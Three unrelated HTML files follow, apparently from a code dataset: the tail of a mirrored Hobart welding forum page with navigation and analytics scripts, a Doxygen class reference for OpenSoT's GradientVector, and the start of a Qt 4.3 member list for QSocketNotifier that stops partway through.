<!-- END TEMPLATE: pagenav_curpage --><!-- BEGIN TEMPLATE: pagenav_pagelink -->
<span><a href="forumdisplayf3f2.html?13-General-Welding-Questions/page2" title="Show results 26 to 50 of 2,213">2</a></span>
<!-- END TEMPLATE: pagenav_pagelink --><!-- BEGIN TEMPLATE: pagenav_pagelink -->
<span><a href="forumdisplay6409.html?13-General-Welding-Questions/page3" title="Show results 51 to 75 of 2,213">3</a></span>
<!-- END TEMPLATE: pagenav_pagelink --><!-- BEGIN TEMPLATE: pagenav_pagelinkrel -->
<span><a href="forumdisplay8da0.html?13-General-Welding-Questions/page11" title="Show results 251 to 275 of 2,213"><!--+10-->11</a></span>
<!-- END TEMPLATE: pagenav_pagelinkrel --><!-- BEGIN TEMPLATE: pagenav_pagelinkrel -->
<span><a href="forumdisplay9b76.html?13-General-Welding-Questions/page51" title="Show results 1,251 to 1,275 of 2,213"><!--+50-->51</a></span>
<!-- END TEMPLATE: pagenav_pagelinkrel -->
<span class="separator">...</span>
<span class="prev_next"><a rel="next" href="forumdisplayf3f2.html?13-General-Welding-Questions/page2" title="Next Page - Results 26 to 50 of 2,213"><img src="images/pagination/next-right.png" alt="Next" /></a></span>
<span class="first_last"><a href="forumdisplaydfb2.html?13-General-Welding-Questions/page89" title="Last Page - Results 2,201 to 2,213 of 2,213">Last<img src="images/pagination/last-right.html" alt="Last" /></a></span>
<ul class="popupbody popuphover">
<li class="formsubmit jumptopage"><label>Jump to page: <input type="text" name="page" size="4" /></label> <input type="submit" class="button" value="Go" /></li>
</ul>
</form>
<!-- END TEMPLATE: pagenav -->
<!-- BEGIN TEMPLATE: forumjump -->
<div class="clear"></div>
<div class="navpopupmenu popupmenu nohovermenu" id="forumdisplay_navpopup">
<span class="shade">Quick Navigation</span>
<a href="forumdisplay4309.html?13-General-Welding-Questions" class="popupctrl"><span class="ctrlcontainer">General Welding Questions</span></a>
<a href="forumdisplay4309.html?13-General-Welding-Questions#top" class="textcontrol" onclick="document.location.hash='top';return false;">Top</a>
<ul class="navpopupbody popupbody popuphover">
<li class="optionlabel">Site Areas</li>
<li><a href="usercp.html">Settings</a></li>
<li><a href="private.html">Private Messages</a></li>
<li><a href="subscription.html">Subscriptions</a></li>
<li><a href="online.html">Who's Online</a></li>
<li><a href="search.html">Search Forums</a></li>
<li><a href="forum.html">Forums Home</a></li>
<li class="optionlabel">Forums</li>
<li><a href="forumdisplay7bed.html?7-OFFICE">OFFICE</a>
<ol class="d1">
<li><a href="forumdisplaya4eb.html?8-Announcements">Announcements</a></li>
<li><a href="forumdisplayf240.html?9-Questions-Suggestions-and-Support">Questions, Suggestions and Support</a></li>
<li><a href="forumdisplayf342.html?11-New-Member-Introductions">New Member Introductions</a></li>
</ol>
</li>
<li><a href="forumdisplay03b4.html?12-EQUIPMENT-TALK">EQUIPMENT TALK</a>
<ol class="d1">
<li><a href="forumdisplay4309.html?13-General-Welding-Questions">General Welding Questions</a></li>
<li><a href="forumdisplay20fc.html?14-MIG-Wire-Welders">MIG / Wire Welders</a></li>
<li><a href="forumdisplayacab.html?15-Stick-Welders">Stick Welders</a></li>
<li><a href="forumdisplay12fe.html?16-TIG-Welders">TIG Welders</a></li>
<li><a href="forumdisplay6d5c.html?17-Generator-Welders">Generator/Welders</a></li>
<li><a href="forumdisplayc7b1.html?18-Plasma-Cutters">Plasma Cutters</a></li>
<li><a href="forumdisplayd49c.html?19-Oxy-Acetylene">Oxy Acetylene</a></li>
<li><a href="forumdisplay5422.html?20-Welding-Helmets-amp-Safety-Gear">Welding Helmets & Safety Gear</a></li>
<li><a href="forumdisplay9f8b.html?21-Shielding-Gases">Shielding Gases</a></li>
<li><a href="forumdisplay0284.html?22-Metal-Working-Tools">Metal Working Tools</a></li>
</ol>
</li>
<li><a href="forumdisplayd7ab.html?23-APPLICATION-TALK">APPLICATION TALK</a>
<ol class="d1">
<li><a href="forumdisplay6c29.html?24-Mild-Steel">Mild Steel</a></li>
<li><a href="forumdisplayd88d.html?25-Stainless-Steel">Stainless Steel</a></li>
<li><a href="forumdisplay9df3.html?26-Aluminum">Aluminum</a></li>
<li><a href="forumdisplay682d.html?27-Other-Specialty-Alloys-Castings-etc">Other Specialty Alloys, Castings, etc.</a></li>
</ol>
</li>
<li><a href="forumdisplayb117.html?28-WELDING-PROJECTS-amp-CONVERSATIONS-BY-COMMUNITY">WELDING PROJECTS & CONVERSATIONS BY COMMUNITY</a>
<ol class="d1">
<li><a href="forumdisplaya9de.html?29-Metal-Art-Sculpture">Metal Art / Sculpture</a></li>
<li><a href="forumdisplaya1fd.html?30-On-the-Farm-Ranch">On the Farm / Ranch</a></li>
<li><a href="forumdisplayf9d3.html?31-Home-Hobbyist">Home Hobbyist</a></li>
<li><a href="forumdisplay5b25.html?32-Auto-Repair-Restoration">Auto Repair / Restoration</a></li>
<li><a href="forumdisplay9eb0.html?6-Off-Road-Trucks">Off-Road/Trucks</a></li>
<li><a href="forumdisplay340a.html?33-Cycle-ATV-Kart">Cycle / ATV / Kart</a></li>
<li><a href="forumdisplayd9db.html?34-Custom-Metal-Fabrication">Custom Metal Fabrication</a></li>
<li><a href="forumdisplay3386.html?35-Small-Acreage-Country-Living">Small Acreage / Country Living</a></li>
<li><a href="forumdisplay01d4.html?39-FFA-Organization">FFA Organization</a></li>
</ol>
</li>
<li><a href="forumdisplay65b3.html?36-CLASSIFIED-ADS">CLASSIFIED ADS</a>
<ol class="d1">
<li><a href="forumdisplaydabe.html?37-Buy-Sell-or-Trade">Buy, Sell or Trade</a></li>
</ol>
</li>
<li><a href="forumdisplaycb5a.html?38-WELD-TALK-TOPIC-ARCHIVE">WELD TALK TOPIC ARCHIVE</a>
<ol class="d1">
<li><a href="forumdisplaye639.html?3-Welding-Products">Welding Products</a></li>
<li><a href="forumdisplay975d.html?4-Welding-Processes">Welding Processes</a></li>
<li><a href="forumdisplay1943.html?5-Welding-Projects">Welding Projects</a></li>
</ol>
</li>
</ul>
</div>
<div class="clear"></div>
<!-- END TEMPLATE: forumjump -->
</div>
</div>
<div id="forum_info_options" class="forum_info block">
<div class="collapse">
<a class="collapse" id="collapse_forum_info" href="forumdisplay4309.html?13-General-Welding-Questions#top"><img src="images/buttons/collapse_40b.html" alt="" /></a>
<h4 class="forumoptiontitle blockhead">Forum Information and Options</h4>
</div>
<div id="forum_info" class="forum_info_block blockbody formcontrols">
<div id="forum_onlineusers" class="forum_info_subblock">
<h5>Users Browsing this Forum</h5>
<div>
<p>There are currently <a href="online.html">4 users browsing this forum</a>. (0 members & 4 guests)</p>
<ol class="commalist">
</ol>
</div>
</div>
</div>
<!-- BEGIN TEMPLATE: ad_forum_below_threadlist -->
<!-- END TEMPLATE: ad_forum_below_threadlist -->
<div class="collapse">
<a class="collapse" id="collapse_forum_options" href="forumdisplay4309.html?13-General-Welding-Questions#top"><img src="images/buttons/collapse_40b.html" alt="" /></a>
<h4 class="forumoptiontitle blockhead">Thread Display Options</h4>
</div>
<div id="forum_options" class="forum_info_form_block">
<form id="forum_display_options" action="http://www.hobartwelders.com/weldtalk/forumdisplay.php" method="get" class="forum_info_form blockbody formcontrols floatcontainer">
<input type="hidden" name="s" value="" />
<input type="hidden" name="f" value="13" />
<input type="hidden" name="page" value="1" />
<input type="hidden" name="pp" value="25" />
<div>
<div class="options_input_block">
<label for="sel_daysprune">Show threads from the...</label>
<select class="primary" id="sel_daysprune" name="daysprune">
<option value="1" >Last Day</option>
<option value="2" >Last 2 Days</option>
<option value="7" >Last Week</option>
<option value="10" >Last 10 Days</option>
<option value="14" >Last 2 Weeks</option>
<option value="30" >Last Month</option>
<option value="45" >Last 45 Days</option>
<option value="60" >Last 2 Months</option>
<option value="75" >Last 75 Days</option>
<option value="100" >Last 100 Days</option>
<option value="365" >Last Year</option>
<option value="-1" selected="selected">Beginning</option>
</select>
<p class="description">Use this control to limit the display of threads to those newer than the specified time frame.</p>
</div>
<div class="options_input_block">
<label for="sel_sort">Sort threads by:</label>
<select class="primary" id="sel_sort" name="sort">
<option value="title" >Thread Title</option>
<option value="lastpost" selected="selected">Last Post Time</option>
<option value="dateline" >Thread Start Time</option>
<option value="replycount" >Number of Replies</option>
<option value="views" >Number of Views</option>
<option value="postusername" >Thread Starter</option>
<option value="voteavg" >Thread Rating</option>
</select>
<p class="description">Allows you to choose the data by which the thread list will be sorted.</p>
</div>
<!-- Group of Radio Buttons -->
<div class="options_input_block">
<p class="label">Order threads in...</p>
<ul class="checkradio group">
<li><label for="radio_asc"><input type="radio" name="order" id="radio_asc" value="asc" /> Ascending Order</label></li>
<li><label for="radio_dsc"><input type="radio" name="order" id="radio_dsc" value="desc" checked="checked" /> Descending Order</label></li>
</ul>
<p class="description">Note: when sorting by date, 'descending order' will show the newest results first.</p>
</div>
</div>
<div class="options_input_wrapper">
<div class="options_input_block">
<div class="group">
<input type="submit" class="button" value="Show Threads" />
</div>
</div>
</div>
</form>
</div>
<div class="options_block_container">
<div class="options_block">
<div class="collapse options_correct">
<a class="collapse" id="collapse_forum_icon_legend" href="forumdisplay4309.html?13-General-Welding-Questions#top"><img src="images/buttons/collapse_40b.html" alt="" /></a>
<h4 class="blockhead">Icon Legend</h4>
</div>
<div id="forum_icon_legend" class="forum_info_block blockbody formcontrols options_correct">
<dl id="icon_legends" class="forum_info_subblock icon_legends">
<dt><img src="images/statusicon/thread_new-16.html" alt="Contains unread posts" /></dt><dd>Contains unread posts</dd>
<dt><img src="images/statusicon/thread-16-right.html" alt="Contains no unread posts" /></dt><dd>Contains no unread posts</dd>
<dt><img src="images/statusicon/thread_hot_new-16.png" alt="More than 15 replies or 150 views" /></dt><dd>Hot thread with unread posts</dd>
<dt><img src="images/statusicon/thread_hot-16.png" alt="More than 15 replies or 150 views" /></dt><dd>Hot thread with no unread posts</dd>
<dt><img src="images/statusicon/thread_lock-16.png" alt="Closed Thread" /></dt><dd>Thread is closed</dd>
<dt><img src="images/statusicon/thread_dot-16-right.png" alt="Thread Contains a Message Written By You" /></dt><dd>You have posted in this thread</dd>
</dl>
</div>
</div>
<div class="options_block2">
<div class="collapse options_correct">
<a class="collapse" id="collapse_posting_rules" href="forumdisplay4309.html?13-General-Welding-Questions#top"><img src="images/buttons/collapse_40b.html" alt="" /></a>
<h4 class="blockhead">Posting Permissions</h4>
</div>
<div id="posting_rules" class="forum_info_block blockbody formcontrols floatcontainer options_correct">
<!-- BEGIN TEMPLATE: forumrules -->
<div id="forumrules" class="info_subblock">
<ul class="youcandoblock">
<li>You <strong>may not</strong> post new threads</li>
<li>You <strong>may not</strong> post replies</li>
<li>You <strong>may not</strong> post attachments</li>
<li>You <strong>may not</strong> edit your posts</li>
<li> </li>
</ul>
<div class="bbcodeblock">
<ul>
<li><a href="miscaff0.html?do=bbcode" target="_blank">BB code</a> is <strong>On</strong></li>
<li><a href="misc9712.html?do=showsmilies" target="_blank">Smilies</a> are <strong>On</strong></li>
<li><a href="miscaff0.html?do=bbcode#imgcode" target="_blank">[IMG]</a> code is <strong>On</strong></li>
<li><a href="miscaff0.html?do=bbcode#videocode" target="_blank">[VIDEO]</a> code is <strong>On</strong></li>
<li>HTML code is <strong>Off</strong></li>
</ul>
</div>
<p class="rules_link"><a href="misc17ec.html?do=showrules" target="_blank">Forum Rules</a></p>
</div>
<!-- END TEMPLATE: forumrules -->
</div>
</div>
</div>
</div>
<script type="text/javascript">
<!--
vbphrase['doubleclick_forum_markread'] = "Double-click this icon to mark this forum and its contents as read";
init_forum_readmarker_system();
//-->
</script>
<!-- BEGIN TEMPLATE: footer -->
<div style="clear: left">
<!-- BEGIN TEMPLATE: ad_footer_start -->
<!-- END TEMPLATE: ad_footer_start -->
<!-- BEGIN TEMPLATE: ad_global_above_footer -->
<!-- END TEMPLATE: ad_global_above_footer -->
</div>
<div id="footer2" class="floatcontainer footer">
<form action="http://www.hobartwelders.com/weldtalk/index.php" method="get" id="footer_select" class="footer_select">
<select name="styleid" onchange="switch_id(this, 'style')">
<optgroup label="Quick Style Chooser"><option class="hidden"></option></optgroup>
<optgroup label=" Standard Styles">
<!-- BEGIN TEMPLATE: option -->
<option value="5" class="" selected="selected">-- Hobart Orange (Generated)</option>
<!-- END TEMPLATE: option -->
</optgroup>
<optgroup label=" Mobile Styles">
<!-- BEGIN TEMPLATE: option -->
<option value="6" class="" >-- Default Mobile Style</option>
<!-- END TEMPLATE: option -->
</optgroup>
</select>
</form>
<ul id="footer_links" class="footer_links">
<li><a href="sendmessage.html" rel="nofollow" accesskey="9">Feedback/Help</a></li>
<li><a href="../index.html">Hobart Welding Products</a></li>
<li><a href="archive/index.html">Archive</a></li>
<li><a href="forumdisplay4309.html?13-General-Welding-Questions#top" onclick="document.location.hash='top'; return false;">Top</a></li>
</ul>
<script type="text/javascript">
<!--
// Main vBulletin Javascript Initialization
vBulletin_init();
//-->
</script>
</div>
</div> <!-- closing div for body_wrapper -->
<div class="below_body">
<div id="footer_time" class="shade footer_time">All times are GMT -5. The time now is <span class="time">10:55 PM</span>.</div>
<div id="footer_copyright" class="shade footer_copyright">
<!-- Do not remove this copyright notice -->
<!-- Do not remove this copyright notice -->
</div>
<div id="footer_morecopyright" class="shade footer_morecopyright">
<!-- Do not remove cronimage or your scheduled tasks will cease to function -->
<img src="cron488b.gif?rand=1377575707" alt="" width="1" height="1" border="0" />
<!-- Do not remove cronimage or your scheduled tasks will cease to function -->
</div>
<!-- BEGIN TEMPLATE: ad_footer_end -->
<!-- END TEMPLATE: ad_footer_end -->
</div>
<div id="footer">
<img class="warrantyicon" src="../images/531warranty.png" alt="Hobart 5/3/1 Industrial Warranty" />
<a href="../products/index.html">Welding Products</a> | <a href="../products/wirefeed/index.html">Wire Feed Welders</a> | <a href="../products/tig/index.html">TIG</a> | <a href="../products/stick/index.html">Stick Welders</a> | <a href="../products/generators/index.html">Generator/Welders</a> | <a href="../products/plasma/index.html">Plasma Cutters</a> | <a href="../products/oxyfuel/index.html">Oxy-Acetylene / Propane</a> | <a href="../products/welding-helmets/index.html">Welding Helmets</a><br />
<a href="../products/electrodes-wire/index.html">Filler Metals</a> | <a href="../products/accessories/index.html">Accessories</a> | <a href="../service/owners-manuals/index.html">Owner's Manuals</a> | <a href="../wheretobuy/index2595.html?svc=service">Service Locator</a> | <a href="../service/warranty/index.html">Warranty</a> | <a href="../service/registration/index.html">Product Registration</a> | <a href="../elearning/index.html">E-Learning</a> | <a href="../service/welding-links/index.html">Welding Links</a> | <a href="../service/msds/index.html">MSDS</a> | <a href="../contact/index.html">Contact Us</a><br />
<a href="../service/orderlit.html">Order Literature</a> | <a href="../privacy.html">Privacy Policy</a> | <a href="../termsofuse.html">Terms of Use</a> | <a href="../about/termsofsale.html">Terms & Conditions of Sale</a> | <a href="../about/reconditioned.html">Reconditioned Warranty</a> | <a href="../sitemap.html">Site Map</a>
</div>
<div id="copyright">
<div id="copyright-main">
<img src="../images/hobart-brothers.png" alt="Hobart Brothers Co.">
<br><br>
©2013 Hobart Welders
</div>
<div id="copyright-social">
<img src="../images/get_connected.jpg" />
<a href="http://www.facebook.com/HobartWelding"><img src="../images/fb_icon.jpg" alt="Hobart Facebook" /></a>
<a href="http://twitter.com/hobartwelders"><img src="../images/tw_icon.jpg" alt="Hobart Twitter" /></a>
<a href="http://www.youtube.com/user/HobartWelders"><img src="../images/yt_icon.jpg" alt="Hobart YouTube"/></a>
<a href="http://blog.hobartwelders.com/"><img src="../images/bg_icon.jpg" alt="Hobart Blog" /></a>
</div>
</div>
<!-- Start Alexa Certify Javascript -->
<script type="text/javascript" src="../../d31qbv1cthcecs.cloudfront.net/atrk.js"></script>
<script type="text/javascript">_atrk_opts = { atrk_acct: "kFGBf1a0mz00i3", domain:"hobartwelders.com"}; atrk ();</script>
<noscript><img src="../../d5nxst8fruw4z.cloudfront.net/atrk59ca.gif?account=kFGBf1a0mz00i3" style="display:none" height="1" width="1" alt="" /></noscript>
<!-- End Alexa Certify Javascript -->
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-321856-1");
pageTracker._trackPageview();
} catch(err) {}</script>
</div> <!-- wrap -->
<!-- END TEMPLATE: footer -->
</body>
<!-- Mirrored from www.hobartwelders.com/weldtalk/forumdisplay.php?13-General-Welding-Questions by HTTrack Website Copier/3.x [XR&CO'2010], Tue, 27 Aug 2013 05:08:18 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><!-- /Added by HTTrack -->
</html>
<!-- END TEMPLATE: FORUMDISPLAY --> |
classGradientVector.html | OpenSoT/OpenSoT.github.io | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<meta name="generator" content="Doxygen 1.8.11"/>
<title>OpenSoT: GradientVector Class Reference</title>
<link href="tabs.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="jquery.js"></script>
<script type="text/javascript" src="dynsections.js"></script>
<link href="search/search.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="search/searchdata.js"></script>
<script type="text/javascript" src="search/search.js"></script>
<script type="text/javascript">
$(document).ready(function() { init_search(); });
</script>
<link href="doxygen.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div id="top"><!-- do not remove this div, it is closed by doxygen! -->
<div id="titlearea">
<table cellspacing="0" cellpadding="0">
<tbody>
<tr style="height: 56px;">
<td id="projectlogo"><img alt="Logo" src="openSoT-logo.png"/></td>
<td id="projectalign" style="padding-left: 0.5em;">
<div id="projectname">OpenSoT
 <span id="projectnumber">0.2.0</span>
</div>
<div id="projectbrief">An Open Source Task Solving library with Constraints</div>
</td>
</tr>
</tbody>
</table>
</div>
<!-- end header part -->
<!-- Generated by Doxygen 1.8.11 -->
<script type="text/javascript">
var searchBox = new SearchBox("searchBox", "search",false,'Search');
</script>
<div id="navrow1" class="tabs">
<ul class="tablist">
<li><a href="index.html"><span>Main Page</span></a></li>
<li><a href="pages.html"><span>Related Pages</span></a></li>
<li><a href="namespaces.html"><span>Namespaces</span></a></li>
<li class="current"><a href="annotated.html"><span>Classes</span></a></li>
<li><a href="files.html"><span>Files</span></a></li>
<li><a href="examples.html"><span>Examples</span></a></li>
<li>
<div id="MSearchBox" class="MSearchBoxInactive">
<span class="left">
<img id="MSearchSelect" src="search/mag_sel.png"
onmouseover="return searchBox.OnSearchSelectShow()"
onmouseout="return searchBox.OnSearchSelectHide()"
alt=""/>
<input type="text" id="MSearchField" value="Search" accesskey="S"
onfocus="searchBox.OnSearchFieldFocus(true)"
onblur="searchBox.OnSearchFieldFocus(false)"
onkeyup="searchBox.OnSearchFieldChange(event)"/>
</span><span class="right">
<a id="MSearchClose" href="javascript:searchBox.CloseResultsWindow()"><img id="MSearchCloseImg" border="0" src="search/close.png" alt=""/></a>
</span>
</div>
</li>
</ul>
</div>
<div id="navrow2" class="tabs2">
<ul class="tablist">
<li><a href="annotated.html"><span>Class List</span></a></li>
<li><a href="classes.html"><span>Class Index</span></a></li>
<li><a href="inherits.html"><span>Class Hierarchy</span></a></li>
<li><a href="functions.html"><span>Class Members</span></a></li>
</ul>
</div>
<!-- window showing the filter options -->
<div id="MSearchSelectWindow"
onmouseover="return searchBox.OnSearchSelectShow()"
onmouseout="return searchBox.OnSearchSelectHide()"
onkeydown="return searchBox.OnSearchSelectKey(event)">
</div>
<!-- iframe showing the search results (closed by default) -->
<div id="MSearchResultsWindow">
<iframe src="javascript:void(0)" frameborder="0"
name="MSearchResults" id="MSearchResults">
</iframe>
</div>
</div><!-- top -->
<div class="header">
<div class="summary">
<a href="#pub-methods">Public Member Functions</a> |
<a href="classGradientVector-members.html">List of all members</a> </div>
<div class="headertitle">
<div class="title">GradientVector Class Reference<span class="mlabels"><span class="mlabel">abstract</span></span></div> </div>
</div><!--header-->
<div class="contents">
<p>The <a class="el" href="classGradientVector.html" title="The GradientVector class pure virtual function used to describe functions for computeHessian method...">GradientVector</a> class pure virtual function used to describe functions for computeHessian method.
<a href="classGradientVector.html#details">More...</a></p>
<p><code>#include <<a class="el" href="cartesian__utils_8h_source.html">cartesian_utils.h</a>></code></p>
<div id="dynsection-0" onclick="return toggleVisibility(this)" class="dynheader closed" style="cursor:pointer;">
<img id="dynsection-0-trigger" src="closed.png" alt="+"/> Collaboration diagram for GradientVector:</div>
<div id="dynsection-0-summary" class="dynsummary" style="display:block;">
</div>
<div id="dynsection-0-content" class="dyncontent" style="display:none;">
<div class="center"><iframe scrolling="no" frameborder="0" src="classGradientVector__coll__graph.svg" width="140" height="118"><p><b>This browser is not able to show SVG: try Firefox, Chrome, Safari, or Opera instead.</b></p></iframe>
</div>
</div>
<table class="memberdecls">
<tr class="heading"><td colspan="2"><h2 class="groupheader"><a name="pub-methods"></a>
Public Member Functions</h2></td></tr>
<tr class="memitem:a143dcb808d7f5ca24a0703f91b6d4ad4"><td class="memItemLeft" align="right" valign="top"> </td><td class="memItemRight" valign="bottom"><a class="el" href="classGradientVector.html#a143dcb808d7f5ca24a0703f91b6d4ad4">GradientVector</a> (const int x_size)</td></tr>
<tr class="separator:a143dcb808d7f5ca24a0703f91b6d4ad4"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:a487a91201b986bc9123c1755014a2012"><td class="memItemLeft" align="right" valign="top">virtual Eigen::VectorXd </td><td class="memItemRight" valign="bottom"><a class="el" href="classGradientVector.html#a487a91201b986bc9123c1755014a2012">compute</a> (const Eigen::VectorXd &x)=0</td></tr>
<tr class="memdesc:a487a91201b986bc9123c1755014a2012"><td class="mdescLeft"> </td><td class="mdescRight">compute value of function in x <a href="#a487a91201b986bc9123c1755014a2012">More...</a><br /></td></tr>
<tr class="separator:a487a91201b986bc9123c1755014a2012"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:aad199e1c287bf3904235feaa23711419"><td class="memItemLeft" align="right" valign="top">int </td><td class="memItemRight" valign="bottom"><a class="el" href="classGradientVector.html#aad199e1c287bf3904235feaa23711419">size</a> ()</td></tr>
<tr class="separator:aad199e1c287bf3904235feaa23711419"><td class="memSeparator" colspan="2"> </td></tr>
</table>
<a name="details" id="details"></a><h2 class="groupheader">Detailed Description</h2>
<div class="textblock"><p>The <a class="el" href="classGradientVector.html" title="The GradientVector class pure virtual function used to describe functions for computeHessian method...">GradientVector</a> class pure virtual function used to describe functions for computeHessian method. </p>
<p>Definition at line <a class="el" href="cartesian__utils_8h_source.html#l00047">47</a> of file <a class="el" href="cartesian__utils_8h_source.html">cartesian_utils.h</a>.</p>
</div><h2 class="groupheader">Constructor & Destructor Documentation</h2>
<a class="anchor" id="a143dcb808d7f5ca24a0703f91b6d4ad4"></a>
<div class="memitem">
<div class="memproto">
<table class="mlabels">
<tr>
<td class="mlabels-left">
<table class="memname">
<tr>
<td class="memname">GradientVector::GradientVector </td>
<td>(</td>
<td class="paramtype">const int </td>
<td class="paramname"><em>x_size</em></td><td>)</td>
<td></td>
</tr>
</table>
</td>
<td class="mlabels-right">
<span class="mlabels"><span class="mlabel">inline</span></span> </td>
</tr>
</table>
</div><div class="memdoc">
<p>Definition at line <a class="el" href="cartesian__utils_8h_source.html#l00050">50</a> of file <a class="el" href="cartesian__utils_8h_source.html">cartesian_utils.h</a>.</p>
</div>
</div>
<h2 class="groupheader">Member Function Documentation</h2>
<a class="anchor" id="a487a91201b986bc9123c1755014a2012"></a>
<div class="memitem">
<div class="memproto">
<table class="mlabels">
<tr>
<td class="mlabels-left">
<table class="memname">
<tr>
<td class="memname">virtual Eigen::VectorXd GradientVector::compute </td>
<td>(</td>
<td class="paramtype">const Eigen::VectorXd & </td>
<td class="paramname"><em>x</em></td><td>)</td>
<td></td>
</tr>
</table>
</td>
<td class="mlabels-right">
<span class="mlabels"><span class="mlabel">pure virtual</span></span> </td>
</tr>
</table>
</div><div class="memdoc">
<p>compute value of function in x </p>
<dl class="params"><dt>Parameters</dt><dd>
<table class="params">
<tr><td class="paramname">x</td><td></td></tr>
</table>
</dd>
</dl>
<dl class="section return"><dt>Returns</dt><dd>scalar </dd></dl>
</div>
</div>
<a class="anchor" id="aad199e1c287bf3904235feaa23711419"></a>
<div class="memitem">
<div class="memproto">
<table class="mlabels">
<tr>
<td class="mlabels-left">
<table class="memname">
<tr>
<td class="memname">int GradientVector::size </td>
<td>(</td>
<td class="paramname"></td><td>)</td>
<td></td>
</tr>
</table>
</td>
<td class="mlabels-right">
<span class="mlabels"><span class="mlabel">inline</span></span> </td>
</tr>
</table>
</div><div class="memdoc">
<p>Definition at line <a class="el" href="cartesian__utils_8h_source.html#l00058">58</a> of file <a class="el" href="cartesian__utils_8h_source.html">cartesian_utils.h</a>.</p>
</div>
</div>
<hr/>The documentation for this class was generated from the following file:<ul>
<li>/home/enrico/advr-superbuild/external/OpenSoT/include/OpenSoT/utils/<a class="el" href="cartesian__utils_8h_source.html">cartesian_utils.h</a></li>
</ul>
</div><!-- contents -->
<!-- start footer part -->
<hr class="footer"/><address class="footer"><small>
Generated on Tue Sep 11 2018 12:44:33 for OpenSoT by  <a href="http://www.doxygen.org/index.html">
<img class="footer" src="doxygen.png" alt="doxygen"/>
</a> 1.8.11
</small></address>
</body>
</html>
|
doc/html/qsocketnotifier-members.html | muromec/qtopia-ezx | <?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Qt 4.3: List of All Members for QSocketNotifier</title>
<link href="classic.css" rel="stylesheet" type="text/css" />
</head>
<body>
<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td align="left" valign="top" width="32"><a href="http://www.trolltech.com/products/qt"><img src="images/qt-logo.png" align="left" width="32" height="32" border="0" /></a></td>
<td width="1"> </td><td class="postheader" valign="center"><a href="index.html"><font color="#004faf">Home</font></a> · <a href="classes.html"><font color="#004faf">All Classes</font></a> · <a href="mainclasses.html"><font color="#004faf">Main Classes</font></a> · <a href="groups.html"><font color="#004faf">Grouped Classes</font></a> · <a href="modules.html"><font color="#004faf">Modules</font></a> · <a href="functions.html"><font color="#004faf">Functions</font></a></td>
<td align="right" valign="top" width="230"><a href="http://www.trolltech.com"><img src="images/trolltech-logo.png" align="right" width="203" height="32" border="0" /></a></td></tr></table><h1 class="title">List of All Members for QSocketNotifier</h1>
<p>This is the complete list of members for <a href="qsocketnotifier.html">QSocketNotifier</a>, including inherited members.</p>
<p><table width="100%" border="0" cellpadding="0" cellspacing="0">
<tr><td width="45%" valign="top"><ul>
<li><div class="fn"/>enum <a href="qsocketnotifier.html#Type-enum">Type</a></li>
<li><div class="fn"/><a href="qsocketnotifier.html#QSocketNotifier">QSocketNotifier</a> ( int, Type, QObject * )</li>
<li><div class="fn"/><a href="qsocketnotifier.html#dtor.QSocketNotifier">~QSocketNotifier</a> ()</li>
<li><div class="fn"/><a href="qsocketnotifier.html#activated">activated</a> ( int )</li>
<li><div class="fn"/><a href="qobject.html#blockSignals">blockSignals</a> ( bool ) : bool</li>
<li><div class="fn"/><a href="qobject.html#childEvent">childEvent</a> ( QChildEvent * )</li>
<li><div class="fn"/><a href="qobject.html#children">children</a> () const : const QObjectList &</li>
<li><div class="fn"/><a href="qobject.html#connect">connect</a> ( const QObject *, const char *, const QObject *, const char *, Qt::ConnectionType ) : bool</li>
<li><div class="fn"/><a href="qobject.html#connect-2">connect</a> ( const QObject *, const char *, const char *, Qt::ConnectionType ) const : bool</li>
<li><div class="fn"/><a href="qobject.html#connectNotify">connectNotify</a> ( const char * )</li>
<li><div class="fn"/><a href="qobject.html#customEvent">customEvent</a> ( QEvent * )</li>
<li><div class="fn"/><a href="qobject.html#d_ptr-var">d_ptr</a> : QObjectData *</li>
<li><div class="fn"/><a href="qobject.html#deleteLater">deleteLater</a> ()</li>
<li><div class="fn"/><a href="qobject.html#destroyed">destroyed</a> ( QObject * )</li>
<li><div class="fn"/><a href="qobject.html#disconnect">disconnect</a> ( const QObject *, const char *, const QObject *, const char * ) : bool</li>
<li><div class="fn"/><a href="qobject.html#disconnect-2">disconnect</a> ( const char *, const QObject *, const char * ) : bool</li>
<li><div class="fn"/><a href="qobject.html#disconnect-3">disconnect</a> ( const QObject *, const char * ) : bool</li>
<li><div class="fn"/><a href="qobject.html#disconnectNotify">disconnectNotify</a> ( const char * )</li>
<li><div class="fn"/><a href="qobject.html#dumpObjectInfo">dumpObjectInfo</a> ()</li>
<li><div class="fn"/><a href="qobject.html#dumpObjectTree">dumpObjectTree</a> ()</li>
<li><div class="fn"/><a href="qobject.html#dynamicPropertyNames">dynamicPropertyNames</a> () const : QList<QByteArray></li>
<li><div class="fn"/><a href="qobject.html#event">event</a> ( QEvent * ) : bool</li>
<li><div class="fn"/><a href="qobject.html#eventFilter">eventFilter</a> ( QObject *, QEvent * ) : bool</li>
<li><div class="fn"/><a href="qobject.html#findChild">findChild</a> ( const QString & ) const : T</li>
<li><div class="fn"/><a href="qobject.html#findChildren">findChildren</a> ( const QString & ) const : QList<T></li>
<li><div class="fn"/><a href="qobject.html#findChildren-2">findChildren</a> ( const QRegExp & ) const : QList<T></li>
<li><div class="fn"/><a href="qobject.html#inherits">inherits</a> ( const char * ) const : bool</li>
